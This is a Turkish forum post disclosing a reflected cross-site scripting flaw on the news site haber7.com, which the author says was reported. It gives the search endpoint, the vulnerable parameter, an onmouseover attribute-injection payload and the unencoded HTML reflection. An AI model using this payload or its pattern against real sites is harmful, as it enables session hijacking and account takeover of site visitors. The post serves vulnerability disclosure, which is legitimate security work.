- Katılım
- 2 Ocak 2026
- Mesajlar
- 55
- Tepkime puanı
- 185
- Puan
- 33
Merhaba Bughanê Üyeleri!
Bugün Haber7’de (haber7.com) tespit ettiğim ve başarıyla raporladığım Reflected XSS zafiyetini detaylı teknik analiz ile paylaşıyorum.
Bugün Haber7’de (haber7.com) tespit ettiğim ve başarıyla raporladığım Reflected XSS zafiyetini detaylı teknik analiz ile paylaşıyorum.
ZAFİYET DETAYLARI
- Hedef: https://www.haber7.com
- Parametre: q
- Endpoint: /arama?q=
- Tip: Reflected Cross-Site Scripting (XSS)
- PAYLOAD:"onmouseover="alert('ATAKAN')" atakan="
- Etkisi: Session Hijacking / Keylogger / Phishing / Account Takeover
Çalışma Mantığı:
Sayfa içerisinde kullanıcı girdisi, birden fazla noktada (özellikle <title> etiketi ve HTML attribute’ları içinde) herhangi bir filtreleme veya encode işlemi uygulanmadan doğrudan yansıtılmaktadır.
HTML:
<title>"onmouseover="alert('ATAKAN')" atakan=" arama sonuçları - Haber 7</title>
<div class="page-container"
data-current-title=""onmouseover="alert('ATAKAN')" atakan=" kelimesini içeren haberler - Haber7 Sayfa - Sayfa 1"
data-current-page="/arama?q="onmouseover="alert('ATAKAN')" atakan="&page=1">
</div>